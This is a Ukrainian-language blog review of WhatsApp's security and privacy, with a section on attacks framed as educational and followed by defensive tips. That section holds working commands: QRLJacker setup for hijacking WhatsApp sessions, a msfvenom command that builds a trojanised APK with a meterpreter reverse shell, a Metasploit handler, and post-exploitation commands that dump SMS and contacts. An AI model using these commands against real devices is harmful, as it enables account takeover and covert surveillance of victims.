👤Принцип використання WhatsApp побудований на взаємодії користувача з мобільним додатком WhatsApp Messenger, який виступає основним клієнтом для зв’язку з серверною інфраструктурою WhatsApp.
Для початку роботи, користувач має самостійно завантажити на свій мобільний пристрій додаток WhatsApp Messenger з інтернету: офіційного сайту (пряме посилання на Android APK) або репозиторіїв Google Play Store і Apple App Store. Підтримуються операційні системи: Android (5.0+), iOS (12+) та KaiOS 2.5.0 (детальніше).
Далі користувачу необхідно пройти реєстрацію по номеру телефона – підтвердивши його по SMS або через дзвінок. Після цього користувач отримує персональний обліковий запис в системі WhatsApp, також паралельно створюються ключі шифрування (див. нижче).
Обліковий запис можна додатково захистити паролем, що реалізує двофакторну аутентифікацію.
З квітня 2016 року WhatsApp використовує наскрізне шифрування (E2EE) для всіх комунікацій, включаючи чати, медіафайли, голосові та відеодзвінки.
WhatsApp Messenger виступає основним додатком і має декілька додаткових версій:
📂Файлова структура WhatsApp для Android має наступну ієрархію:
~/Android/media/com.whatsapp/WhatsApp
– шлях, де месенджер зберігає резервні копії та медіафайли. Містить підпапки:Backups
– містить зашифровані резервні копії чатів, контактів, налаштувань, стікерів. Наприклад, ви можете знайти зашифровані файли бази даних контактів wa.db.crypt;Databases
– містить усі ручні та автоматичні резервні копії бази даних у такому форматі: msgstore-YYYY-MM-DD.db.crypt15;Media
– містить усі надіслані й отримані медіафайли, регулярно створюйте резервну копію цієї папки, якщо вона має для вас цінність. Складається з підпапок:WallPaper
– шпалери для чатів;WhatsApp Audio
– містить аудіофайли, отримані/особисті (Private) та відправлені (Sent);WhatsApp Images
– містить графічні файли – “Private” (приватні) й “Sent” (надіслані);WhatsApp Stickers
– стікери;WhatsApp Video Notes
– дані відеонотаток;WhatsApp Animation
– анімовані файли;WhatsApp Documents
– для зберігання документів;WhatsApp Profile Photos
– містить фотографії профіля;WhatsApp Video
– для зберігання відеофайлів;WhatsApp Voice Notes
– містить голосові повідомлення у форматі .opus..shared
– розшарені дані;.trash
– видалені файли;.thumbs
– мініатюри зображень;.SticketThumbs
– мініатюри стікерів.~/Android/data/com.whatsapp/cache
– тут можуть зберігатись деякі тимчасові кешовані дані;/data/data/com.whatsapp
– основна директорія WhatsApp (може бути доступною лише за наявності root-прав), містить підпапки:app_account_switching
– дані перемикання між акаунтами;app_minidumps
– мінідампи додатку;app_textures
– текстури додатку;app_webview
– дані веб-перегляду;cache
– кешовані дані;code_cache
– кеш коду;databases
– бази даних, без шифрування. Наприклад: wa.db – локальна база даних контактів користувача WhatsApp в форматі SQLite, msgstore.db – база даних повідомлень користувача, axolotl.db – містить криптографічні ключі та інші дані, необхідні для ідентифікації власника облікового запису;files
– увага, у цій папці знаходяться основні файли WhatsApp: ключі шифрування (key, encrypted_backup.key), статистика, логи;lib-main
– бібліотеки;shared_prefs
– містить файли налаштувань облікового запису WhatsApp в форматі XML. Наприклад: com.whatsapp_preferences.xml, registration.RegisterPhone.xml./sdcard/WhatsApp/
– щоб заощадити місце в пам’яті пристрою Android, деякі дані WhatsApp можуть зберігатися на SD-карті. Директорія містить наступні теки:.Shared
.trash
Databases
Media
Profile pictures
Як бачимо, на відміну від Telegram, де локальні дані фактично не шифруються і достатньо просто склонувати потрібну службову папку, щоби отримати доступ до сесії, WhatsApp шифрує базу даних і без ключа та спеціалізованого софту її дуже складно дешифрувати. Якщо смартфон нерутований, то дані отримати ще складніше.
Примітка: Неважаючи на вищесказане, варто взяти до уваги той факт, що такі продукти цифрової криміналістики як Cellebrite UFED, Cellebrite Physical Analyzer та Oxygen Forensic Detective, які застосовуються правоохоронними органами по всьому світу, запевняють, що здатні відновити ключі шифрування і розшифрувати будь-які дані. Отже, якщо є ризик фізичного доступу до пристрою – наскрізне шифрування WhatsApp не врятує. Це, до речі, стосується і інших месенджерів, побудованих на тій самій архітектурі, наприклад Signal.
🔒Шифрування WhatsApp базується на криптографічному протоколі Signal Protocol, розробленим у 2013 році в Open Whisper Systems (Signal Foundation) Моксі Марлінспайком.
В ньому використовується 128-бітне асиметричне шифрування за алгоритмом Діффі-Хеллмана (ECDH) з підтримкою технологій: Axolotl (Double Ratchet Algorithm), Curve25519, AES256, SHA256.
Асиметричне шифрування в месенджері WhatsApp працює наступним чином:
Таким чином, усі сеанси і чати в WhatsApp захищені наскрізним End-to-End шифруванням (E2EE, 1:1).
Кожен чат у WhatsApp має свій власний код безпеки. Це – унікальний хеш, який можна знайти на екрані інформації про контакт у вигляді QR-коду або 60-значного номера. Співрозмовники можуть звірити цей код між собою і переконатися, що їх листування автентичне. У випадку, якщо ваш співрозмовник змінить пристрій або його акаунт буде зламано/змінено – ви отримаєте сповіщення про зміну коду безпеки. Ця функція може захистити від атак типу Man-in-the-Middle (“Людина по середині”) і працює на базі бібліотеки AKD.
У своєму наскрізному шифруванні WhatsApp також підтримує технологію Perfect Forward Secrecy (PFS) – це просунута функція безпеки, яка гарантує, що у випадку компрометації одного з ключів шифрування, зловмисник не зможе розшифрувати попередню історію або майбутні повідомлення (крім поточних), тому що ключі шифрування для кожного сеансу щоразу оновлюються.
👉 Детальніше про процес шифрування WhatsApp читайте у технічних документах “WhatsApp Encryption Overview” та “WhatsApp Key Transparency Overview”.
Я спробував проаналізувати мережеву поведінку WhatsApp Messenger на мобільному пристрої під управлінням Android. Для цього скористався звичайним файєрволом No Root Firewall (можна також скористатись – NetCapture).
У висновку, були зафіксовані TCP-з’єднання з хостами на незахищеному 80 та нестандартному 5022 портах. Незахищений 80-й порт використовувався WhatsApp для з’єднання з серверами Amazon, а 5022-й – з Jabber-сервером, який використовується WhatsApp для миттєвого обміну повідомленнями по протоколу XMPP.
З точки зору кібербепзеки, використання незахищеного з’єднання TCP 80 є сумнівним, адже створює ризик перехоплення даних з допомогою атак Man-in-the-Middle (“Людина посередині”, MITM). В офіційній документації він взагалі не згадується, натомість йде мова тільки про захищений 443-й порт на HTTPS-протоколі та 5222 Jabber.
Деякі з IP-адрес хостів, з якими з’єднується WhatsApp, мають шкідливі індикатори в OTX AlienVault та VirusTotal. Подібні з’єднання можна відфільтрувати брандмауером і додатково зашифруватись VPN-тунелем. Але звичайний користувач не буде цього робити. Таким чином, існує ймовірність, що потенційна зловмисна програма (троян або бекдор) чи зловмисник зможуть використати вразливі місця.
Далі я вирішив скласти мережу мапу WhatsApp й почав збирати та аналізувати субдомени, скориставшись інструментом OWASP Amass:
Список доменів і субдоменів WhatsApp:
По даним Subdomain Finder, інфраструктура WhatsApp налічує близько 8669 доменів. Деякі домени були оприлюднені в проєкті The Block List Project.
Також я вирішив перевірити логи WhatsApp, які зберігаються на пристрої в файлі: /data/data/com.whatsapp/files/logs/whatsapp.log
. Виявилося, що додаток постійно звертається до сервісів Facebook, а саме:
Ще раз переконуємося в тому, що WhatsApp є частиною екосистеми Facebook. І нікуди від цього не дітися. За наявності встановленого додатка Facebook, месенджер буде повсякчас обмінюватися з ним даними і взаємодіятиме для різних функцій. Зокрема, він може використовувати сервіси Facebook для синхронізації контактів, резервного копіювання даних, інтеграції з рекламними платформами та багато іншого.
Користувачів, які цінують конфіденційність, подібна спорідненість з Facebook може непокоїти. І не дивно. Адже враховуючи відносно недавній публічний витік інформації користувачів Facebook в Cambridge Analytica (див. нижче), то існують великі побоювання чи навчився Meta (Facebook) захищати дані користувачів на відповідному рівні і як він ними розпоряджається.
Перейдемо до того як WhatsApp обробляє величезні масиви даних, які він отримує через свій додаток від мільйонів користувачів по всьому світу.
Усі дані WhatsApp у зашифрованому та захешованому (знеособленому) вигляді зберігає локально (на пристрої користувача) та віддалено (на хмарних серверах).
Кожен користувач має змогу здійснити експорт облікового запису та переконатись які його дані зберігає месенджер.
Для цього необхідно в налаштуваннях “Settings” обрати розділ “Account” та перейти в “Request account info”, де можна оформити 2 типи звіту – “Request account report” (Звіт про акаунт) та “Request Channels report” (Звіт по каналам):
Звіт буде доступний приблизно через 24 години у вигляді ZIP-архіву з файлами HTML та JSON, які можна відкрити та переглянути на ПК у браузері. Звіт розбитий на 3 розділи: “WhatsApp account information”, “WhatsApp connections”, “WhatsApp settings”. Кожен з них містить детальну інформацію про користувача:
Проаналізувавши даний звіт, а також: локальні бази даних, файли конфігурацій, Умови використання, Політику конфіденційності, Політика щодо інтелектуальної власності, Правила сервісу WhatsApp, Правила пов’язаних продуктів Meta, дані з відкритих джерел, ми сформували повний перелік метрик, які накопичує WhatsApp:
👉 Детальніше про те як WhatsApp обробляє користувацькі дані на офіційному сайті, а також в зведеній таблиці.
Читайте також: Які користувацькі дані збирає Facebook
Облікові записи користувачів можуть бути тимчасово або назавжди заблоковані за наступних умов:
Якщо вважаєте, що ваш обліковий запис заблокували помилково, можете звернутися в технічну підтримку WhatsApp за вказаними контактними формами або написавши на електронну пошту support@support.whatsapp.com.
Користувачу надається право самостійно вилучити свій обліковий запис – для цього у WhatsApp переходимо у налаштування “Settings” -> “Account”, ввести в відповідному полі свій номер й обрати пункт “Delete account”:
Варто зауважити, що після вилучення акаунта, копії даних користувача продовжують зберігатися на серверах WhatsApp ще 30, а в деяких випадках й 90 днів.
Рекомендується попередньо видалити усі свої канали та будь-яку іншу інформацію, щоб вона не продовжувала існувати та з’являтися в месенджері після вашого видалення.
ℹ️ Найповніший список усіх функцій WhatsApp Messenger з детальним описом. Перевірено на OC Android 13. Актуально на момент виходу матеріалу.
ℹ️ Усі приклади нижче приводяться виключно в навчальних цілях з метою захисту.
Суть цієї атаки полягає в отриманні/перехопленні сеансу WhatsApp через QR-код. Зловмисник через фішинг або засобами соціальної інженерії робить усе можливе, щоб жертва відсканувала його QR-код активації WhatsApp на новому пристрої, що призведе до викрадення сесії месенджера. Надалі він отримає повний доступ до облікового запису жертви.
Для проведення атаки можна скориставтися інструментом OWASP QRLJacker:
git clone https://github.com/OWASP/QRLJacking cd QRLJacking/QRLJacker pip install -r requirements.txt python3 QrlJacker.py --verbose --debug use grabber/whatsapp set port 1387 run
Вимоги до встановлення: активний VPN (з деяких IP-адрес запити на отримання QR-коду блокуються), командний рядок Linux (бажано Kali Linux), Python 3, Selenium driver (не вище <4.10, інакше отримаєте помилку “Couldn’t open Firefox! Check the installation instructions again!”), Geckodriver для Mozilla Firefox (браузер повинен запускатися через CLI). Детальний опис встановлення і приклад команд QRLJacker тут.
Після виконаних вище команд, запуститься веб-сервер (Simple HTTP Web Server на Python) з відображенням QR-коду WhatsApp. Хакер через ngrok (ngrok http 1387
), через vps або іншим способом (наприклад, через підроблену публічну точку доступу Wi-Fi) розміщує його в мережі Інтернет на фішинговому сайті й підсовує жертві.
Жертва сканує QR-код, а хакер отримує cookie сесії її месенджера і зберігає собі на комп’ютер локально. Тепер він має доступ до усієї онлайн-переписки, поки сесія жертви активна. Він може закривати, відкривати чати – це ніяк не вплине на обліковий запис і жертва про це не здогадається, якщо не подивиться у список активних сесій в налаштуваннях і не зрозуміє, що її акаунт використовується на іншому пристрої.
Примітка: Додаток QRLJacker перестав оновлюватися й деякі функції можуть не працювати. Для вирішення проблем потребується самостійне втручання в код, або оновлення збоку автора. Існують й інші подібні інструменти, наприклад EvilJack, QRLJackingJS, QRPhisher, Evil QR.
Як захиститися? Не переходити по фішинговим посиланням від незнайомих осіб, завжди перевіряти активні сесії на своєму смартфоні у налаштуваннях WhatsApp (Settings -> Linked Devices). Вилучати старі сесії на пристроях, якими не користуєтеся. Не сканувати невідомі QR-коди. Не авторизуватися на сайтах через QR-код. Критично ставитись до будь-яких закликів до дій. Не вводити і не повідомляти нікому одноразові коди. Уміти виявляти шкідливі сайти і перевіряти доменні імена. У квітні 2024 року жертвами цієї атаки стали тисячі українців.
Цей вид зламу базується на людському факторі – банальних неуважності, необізнаності та наївності жертви.
Зловмиснику потрібно під будь-яких предлогом отримати фізичний доступ – виманити телефон жертви, взяти його в свої руки та перейти у налаштування WhatsApp -> Linked Devices.
Функція Linked Devices дозволяє використовувати обліковий запис WhatsApp на інших додаткових пристроях без введення даних авторизації – достатньо відсканувати QR-код.
Зловмисник таким чином отримує доступ до сесії месенджера разом з повним доступом до акаунта, як у ситуації з QRLJacking. Він зможе анонімно використовувати ваш обліковий запис, переглядати історію листування, експортувати чати, поки жертва не скине сесію в Linked Devices або не видалить свій акаунт.
До речі, з допомогою додатка WhatsWeb Scanner можна сканувати QR-коди і використовувати безліч сесій з різних облікових записів на одному смартфоні.
Як захиститися? Дотримуватися фізичної безпеки пристроїв і персональної безпеки. Встановити PIN-код доступу на смартфон. Усі додатки повинні бути захищені паролем і двофакторною авторизацією. Не відключати сповіщення WhatsApp – додаток може повідомити про вхід з нового пристрою. Не передавати смартфон стороннім в руки. Не залишати без догляду. Не передавати в ремонт із встановленим додатком WhatsApp. Перевіряти прив’язані пристрої і активні сесії в налаштуваннях месенджера.
Вішинг (voice phishing) – це телефонний фішинг, пов’язаний з соціальною інженерією.
Соціальна інженерія – це інформаційно-психологічні маніпуляції з метою отримати конфіденційну інформацію.
Зловмисник реєструє обліковий запис WhatsApp на своєму смартфоні, вказавши номер телефону жертви. Їй має прийти SMS-повідомлення з кодом активації або підтвердженням. Зловмисник телефонує жертві й обманом пробує змусити повідомити код, наприклад представляючись співробітником технічної підтримки мобільного оператора. Далі отриманий код він вводить на своєму пристрої в додатку WhatsApp й таким чином заново реєструється по номеру жертви. Тим часом обліковий запис жертви стає неактивним.
Подібним способом зламують WhatsApp через перевипуск SIM-картки – це спеціальна процедура у мобільних операторів, яка дозволяє відновити втрачену або викрадену SIM через дублікат. Зловмисники звертаються у сервісний центр оператора, представляються власниками мобільного номеру й намагаються переконати службу підтримки, що у них викрали телефон або вони загубили сім-картку. Для підтвердження вони можуть назвати останні дзвінки, суму та дату поповнення, а також іншу конфіденційну інформацію. Коли SIM картка у них, вони можуть виконати з номером будь-які дії, отримати доступ до всіх акаунтів, які були прив’язані до нього.
Як захиститися? Реєструйте мобільний номер на паспортні дані або переходьте на контрактне обслуговування. Не відповідайте на дзвінки з підозрілих номерів. Обов’язково власноруч зареєструйтеся в персональному кабінеті свого мобільного оператора й встановіть стійкий пароль входу. Регулярно переглядайте статистику по своєму акаунту, включаючи дзвінки і споживання інтернету. Забороніть віддалений перевипуск SIM. Нікому ніколи не повідомляйте будь-які коди, SMS-активації, PUK та IMSI, серійні номери тощо. Не публікуйте особисті дані в соцмережах (фінансовий номер телефону, дата народження, зображення або серія паспорту). Не переходьте за фішинговими посиланнями і не відправляйте нікому свої конфіденційні дані.
Фішинг – це вид інтернет-шахрайства, яке здійснюється через електронну пошту.
Знаючи електронну пошту жертви, шахрай нібито від імені служби технічної підтримки WhatsApp відправляє email-листа з проханням перейти за посиланням, інакше акаунт буде забанено. При цьому з допомогою техніки email-спуфінгу він підробив поле відправника, вказавши там support@whatsapp.com або дуже схожий домен. Сам лист максимально оформлений в фірмових кольорах і стилі WhatsApp.
У висновку жертва вірить, що цей лист справді від адміністрації WhatsApp й переходить по фішинговому посиланню, яке веде на зловмисний сайт. Там користувача просять вказати код підтвердження, який надійде в SMS. Таким чином відбувається викрадення облікового запису.
Існують й багато інших сценаріїв, які використовуються зловмисниками для зламу WhatsApp через фішинг.
Як захиститися? Не відкривати email-листи, не відповідати, не переходити за посиланнями від незнайомих адресатів. Якщо є сумніви щодо того чи іншого посилання, можна його перевірити з допомогою спеціальних інструментів та сервісів. Перевіряти email-заголовки та SPF/DKIM підписи листа, щоб запевнитися, що лист не підроблено.
Зловмисник знаючи номер жертви, додає її обліковий запис собі в телефонну книгу й розпочинає діалог. В ході розмови відправляє файл, який містить шкідливий код. Це може бути текстовий документ (PDF/DOCX), відео або звичайна картинка. При цьому нападник застосовує соцінжекнерію та підробляє їх так, щоб вони здавалися максимально легітимними та цікавими. Це можуть бути якісь важливі документи або привабливі фото. Коли жертва відкриває файл, шкідливий код запускається і виконується на її пристрої.
Експлойт може використовувати вразливості у програмному забезпеченні або операційній системі пристрою. У висновку зловмисник повністю бере під контроль мобільний пристрій і може переглядати листування, незважаючи на наскрізне шифрування в месенджері.
Подібну атаку виявили спеціалісти Check Point Research у 2017 році. Зловмисники встигли взламати мільйони акаунтів WhatsApp.
Як захиститися? Завжди оновлювати операційну систему та програмне забезпечення. Не вести спілкування з незнайомими особами, не приймати від них жодних файлів, особливо анімовані GIF або виконувані exe файли. Налаштувати акаунт WhatsApp на максимальну приватність. Не переходити за посиланнями. Здійснювати регулярне антивірусне сканування. Періодично очищати накопичувач мобільного пристрою від зайвих файлів.
Metasploit Framework – це культовий інструмент етичного хакінгу, який містить величезну кількість модулів для злому та застосовується в тестуваннях на проникнення. З його допомогою можна створювати й запускати експлойти, бекдори, шели, пейлоади. Він служить своєрідним містком між системою атакуючого і системою жертви.
Способів як застосувати посередництво Metasploit для зламу WhatsApp – чимало. Розглянемо один з них – згенерувати модифікований APK-файл і встановити його на пристрої жертви.
Основна вимога для успішності проведення атаки: зловмисник і жертва мають перебувати в одній мережі, наприклад підключені до однієї точки доступу Wi-Fi. При виконанні команди ping – пакети мають поступати в обох напрямках.
Алгоритм атаки наступний:
Отже, зловмисник запускає Metasploit в середовищі Linux й з допомогою модуля meterpreter створює на базі готового APK-файлу модифікований шкідливий мобільний додаток:
msfvenom -p android/meterpreter/reverse_tcp -x ~/originalapp.apk LHOST=local_ip LPORT=tcp_port -f raw -o fakeapp.apk
Після виконання файл буде збережено у поточній директорії.
Увага: Аби Metasploit зміг успішно скомпілювати і підписати APK, обов’язково повинні бути встановлені наступні утиліти: apktool, apksigner, zipalign.
Тепер хакеру необхідно доставити цей додаток на цільовий пристрій. Способів як це зробити – безліч. Все залежить від навичок та фантазії. Найпоширеніший – з допомогою фреймворків ADVPhishing, HiddenEye, Gophish, HTTrack, або Social Engineering Tool (SEToolkiT) створити фішинговий сайт і через портативний веб-сервер ngrok або vps опублікувати його в інтернеті.
Жертва переходить на підроблений сайт і нічого не підозрюючи вантажить на свій пристрій додаток, а далі встановлює його (надаючи усі дозволи) і запускає. Бекдор тут же приходить в дію, відкривається порт який зв’язує комп’ютер атакуючого з мобільним пристроєм жертви.
Тим часом хакер вже попередньо запустив Metasploit і чекає коли розпочнеться зворотній сеанс:
use exploit/multi/handler set Payload android/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT XXXX run
Все! Як тільки мережевий міст між обома сторонами налагодиться, у командному рядку фреймворка Metasploit з’явиться повідомлення про успішне відкриття першої сесії Meterpreter:
Пристрій жертви зламано! Далі хакер просто починає раз за разом витягувати потрібну йому інформацію, проводить пост-експлуатацію, користуючись можливостями Metasploit й командами meterpreter, наприклад:
sysinfo
– базова технічна інформація про операційну систему Android жертви;ps
– список активних процесів в сеансі поточного користувача;ifconfig
– вивести список мережевих інтерфейсів;route
– показати таблицю маршрутів мережевого з’єднання;pwd
– отримати шлях поточної директорії;getuid
– вивести ідентифікатор поточного користувача;shell
– перейти в командну оболонку безпосередньо терміналу Android;screenshot
– зробити скріншот дисплею користувача;screenshare
– показати дисплей користувача в реальному часі;localtime
– вивести локальний час на смартфоні користувача;webcam_list
– вивести список відеокамер пристрою;upload
– завантажити файл на пристрій;download
– завантажити файл з пристрою;check_root
– перевірка чи рутований смартфон;dump_sms
– зробити дамп усіх SMS-повідомлень і зберегти в файл;dump_contacts
– зробити дамп контактів користувача;dump_calllog
– зробити дамп останніх стільникових дзвінків на пристрої;send_sms
– відправка SMS-повідомлень з телефону жертви;app_list
– список встановлених додатків;app_run
– запуск додатків;app_install
– встановити додаток;help
.Таким чином, подібні маніпуляції у поєднанні з різними іншими практиками рано чи пізно приведуть до повного зламу і компрометації не лише самого месенджера WhatsApp, а й усієї операційної системи та пов’язаних з нею пристроїв.
Хакер зможе періодично зупиняти та створювати нові сесії, підключатися до смартфона жертви, таємно встановлювати шпигунські додатки, віддалено керувати пристроєм.
Примітка: В останніх версіях ОС Android 14+ вищеописана атака не пройде через службовий модуль, який по замовчуванню перевіряє apk-файли на шкідливий код. Окрім того, спрацьовує захист додатків від Google Play Protect, що завадить віддаленому виконанню шкідливого коду. Якщо хакер спробує переслати фейковий apk жертві через пошту GMAIL – йому теж це не вдасться, адже спрацює вбудований антивірусний сканер Google.
Як захиститися? Своєчасно оновлювати операційну систему Android до останньої версії і всі її компоненти. Майте на увазі, що практично усі Андроїди до 13-14 версії є вразливими. У жодному випадку не використовуйте застарілі Android версії v.4.0-8.0. Не підключайтесь до невідомих Wi-Fi мереж, якщо у вас немає VPN і відповідних систем захисту. Не завантажуйте додатки з невідомих джерел. Звіряйте контрольні суми завантажених додатків. Не вимикайте Google Play Protect.
Даний метод зламу побудований на вразливості, чи то пак недоопрацюванні WhatsApp, яка допускає маніпуляції з розширенням надісланих файлів. Він розрахований на банальну неуважність та необізнаність користувачів, тобто на людський фактор.
Суть проста – згенерувати в Metasploit шкідливий APK-файл з реверс-шелом, підробити його під PDF-документ (при цьому залишаючи оригінальний MIME-тип application/vnd.android.package-archive
, щоб він міг виконатись як APK, а не PDF) і надіслати жертві.
Соціальний інженер переконує її, що це якийсь важливий документ, жертва клікає, завантажує файл і запускає на встановлення. Ну а далі шел приходить в дію і мобільний потрапляє під контроль зловмисника.
Зробити такий PDF-файл банальним перейменуванням APK не вийде. Тому ми будемо використовувати додаткові інструменти і технології, а саме – Python-скрипт, розміщений на GitHub першовідкривача цього методу (0x6rss) та онлайн-платформу UltraMsg.com, яка дозволяє безкоштовно використовувати преміум-функції WhatsApp API.
Отже, алгоритм такий:
python3 wp.py
{"sent":"true","message":"ok","id":3}
WhatsApp дозволяє виконання Python та PHP скриптів через свій додаток. Зловмисник може створити експлойт з реверс-шелом й відправити його жертві. Після кліку шел автоматично приходить в дію й зловмисник отримує віддалений доступ до пристрою.
Цей хак виявив індійський дослідник кібербезпеки Saumyajeet Das. Деталі він розмістив на своєму GitHub. Спеціаліст знайшов три типи файлів, запуск яких клієнт WhatsApp не блокує: .PYZ (програма Python ZIP), .PYZW (програма PyInstaller) і .EVTX (файл журналу подій Windows). Те саме відбувається з скриптами PHP.
Як повідомили фахівці видання BleepingComputer, месенджер блокує виконання лише наступних розширень файлів: .EXE, .COM, .SCR, .BAT, .DLL, .HTA, VBS і Perl. Виконати їх можна було лише після попереднього збереження на диск.
Дослідник повідомив про проблему в Meta, але вони закрили її як n/a, обгрунтувавши це тим, що це не вина користувача, а не додатка.
Додаткові поради і рекомендації безпеки WhatsApp:
Історія WhatsApp – це історія злету та падіння. Марк Цукерберг отримав у спадок величезну цінність – один з найбільших технологічних винаходів людства. А разом з тим довіру мільярдів. Здавалось, необхідно лише підтримувати та розвивати цей успіх, даруючи користувачам омріяний ЦИФРОВИЙ ДОБРОБУТ. Але Meta пішли іншим шляхом. Мабуть, ними керували більше гроші та вигода, аніж ідея та покликання. Як казав Браян Ектон: “Вони просто дуже хороші бізнесмени”.
WhatsApp – це дітище Facebook. І цим все сказано. Реєструючись у WhatsApp, ви фактично реєструєтесь в системі Meta. Увесь трафік “перетікає” по серверам Цукерберга. Ви повинні знати про це, перш ніж встановлювати цей додаток.
Facebook не приховує, що може передавати користувацькі дані третім особам. Інтернетом гуляє безліч історій як Facebook пропонує своїм користувачам долучати у друзі тих, з ким вони раніше спілкувалися у WhatsApp. Він не раз ставав причиною серйозних витоків даних. Багато хто вважає, що саме збір та продаж даних і є основною причиною “безкоштовності” продуктів Meta.
Гасло WhatsApp “Конфіденційність у наших генах” на сьогодні сприймається лише як маркетингова обгортка. Іронічними звучать слова Яна Кума про WhatsApp, які він виказав в інтерв’ю журналу WIRED у 2014 році:
«Я виріс у суспільстві, де все, що ти робиш, підслуховувалося, записувалося, доносилося. Коли ми були дітьми, у мене були друзі, які потрапляли в біду, розповідаючи анекдоти про комуністичних лідерів. Я пам’ятаю, як чув від батьків розповіді про таких дисидентів, як Андрій Сахаров, засуджений до заслання через свої політичні погляди, як Солженіцин, навіть про місцевих дисидентів, яким це набридло ніхто не повинен мати права підслуховувати, інакше ви станете тоталітарною державою, з якої я втік у дитинстві, щоб приїхати в цю країну, де є демократія і свобода слова.
Люди повинні відрізняти нас від таких компаній, як Yahoo! і Facebook, які збирають ваші дані та зберігають їх на своїх серверах. Ми хочемо знати якомога менше про наших користувачів. Ми не знаємо вашого імені, вашої статі… Ми розробили нашу систему максимально анонімною. Ми не керуємося рекламою, тому нам не потрібні персональні бази даних».
Незважаючи на велику кількість різних функцій, у WhatsApp немає заборони на скріншоти й відсутня опція приховання набору клавіатури. Додаток не фільтрує/сканує деякі розширення файлів, котрі можуть надсилати користувачі, що наражає на небезпеку. Групові чати і канали WhatsApp поки що не можуть конкурувати з Telegram чи Matrix через обмеження щодо кількості учасників.
Та найбільший недолік, на мою думку, полягає у розкритті номеру телефона. Коли створювався WhatsApp, мати ідентифікатор у якості мобільного – було круто і дешево, адже він служив альтернативою дороговартісним SMS/MMS. Однак сьогодні, це більше ризик, аніж перевага. Від афер з номерами телефону (смішинг, вішинг, атака SS7, перевипуск SIM-карт) найбільше потерпають саме користувачі WhatsApp. На сьогодні, більшість приватних месенджерів дозволяють приховати номер. WhatsApp – ні.
Завдяки постійним інцидентам безпеки, пов’язаним з NSO Group, WhatsApp нажив собі дурну славу “бекдора”. І власники навіть не намагаються змінити імідж. Месенджер продовжує бити рекорди за кількістю судових позовів і скандалів, використовуватись як інструмент несанкціонованого стеження за політиками, журналістами, нонкомформістами, дисидентами по всьому світу.
Й не дивно, адже Meta/WhatsApp – це повністю централізований додаток з закритим вихідним кодом і сильною цензурою. Більше тисячі людей модерують Facebook і WhatsApp. Вони можуть отримувати доступ до широкого набору користувацьких даних. А ще WhatsApp системно співпрацює зі спецслужбами й правохоронними органами по всьому світу.
Що цікаво, люди які зареєстровані у Whatsapp в різних країнах – підпадають під різні юрисдискції, котрі передбачають різні рівні конфіденційності додатку. Тобто, правила WhatsApp для всіх неоднозначні. Ось чому не варто дивуватися, коли хтось говорить, що має інший досвід користування. Довіряйте не тому, що кажуть або написано на упаковці, а побаченому, почутому і перевіреному.
До речі, WhatsApp як компанія знімає з себе відповідальність за використання їх продукту. Тобто, якщо вас зламає NSO через якусь діру WhatsApp – це буде ваша вина. Ви добровільно погодились використовувати WhatsApp на свій страх і ризик.
На мою думку, об’єднувати орієнтований на приватність месенджер і гігантську соцмережу з такою репутацією у єдину платформу – було жахливою помилкою.
Сама ідея миттєвого обміну повідомленнями, яку реалізував WhatsApp, безумовно є проривом в інформаційних технологіях. І варто подякувати творцям Яну Куму та Браяну Ектону. По суті WhatsApp запустив цілу індустрію месенджерів, відкрив дорогу Signal, Threema, Element, Briar та іншим…
Але мій вердикт незмінний – я не рекомендую WhatsApp людям, які дбають про безпеку і приватність.
Пам’ятайте – безкоштовний сир лише у мишоловці!
⏩ F.A.Q. WhatsApp
⏩ WhatsApp F.A.Q. Search
⏩ WhatsApp Terms
⏩ WhatsApp Privacy Policy
⏩ WhatsApp Blog
⏩ WhatsApp Brand
⏩ WhatsApp Facebook
⏩ WhatsApp Twitter
⏩ WhatsApp GitHub
⏩ WhatsApp LinkedIn
⏩ WhatsApp Reddit
⏩ Wikipedia. WhatsApp
⏩ Wikipedia. Jan Koum
⏩ Wikipedia. Brian Acton
⏩ Brian Acton Official Facebook Page
⏩ Brian Acton Twitter
⏩ Jan Koum Twitter
⏩ Youtube. What’s Up WhatsApp? (Jan Koum, CEO at WhatsApp & David Rowan) | DLD14
⏩ Surveillance Self-defense. How to: Use WhatsApp on Android
⏩ Medium.com. Grugq. Operational WhatsApp.
⏩ Benedict Evans. Whatsapp and $19bn
⏩ Medium.com: Tag WhatsApp
⏩ Reddit. 5 Reasons Not to Use WhatsApp
👉 Читайте також:
ПОДІЛИТИСЬ У СОЦМЕРЕЖАХ:
Вкажіть, будь ласка, контактний номер телефону. Наш менеджер миттєво зв’яжеться з Вами!
Дякую автору за статті по ватсапу та телеграму. Чи чекати таку ж статтю про вайбер? І ще б хотілося про українські месенджери: Dober, Lecksis
Звичайно, очікуйте! Матеріал про Вайбер вже в процесі. По українським месенджерам – тестуємо. Просимо підтримати нас дружнім донатом: BTC 13CGpPW6Ciir6XvCHuXXn53Vtgtm3AVSnL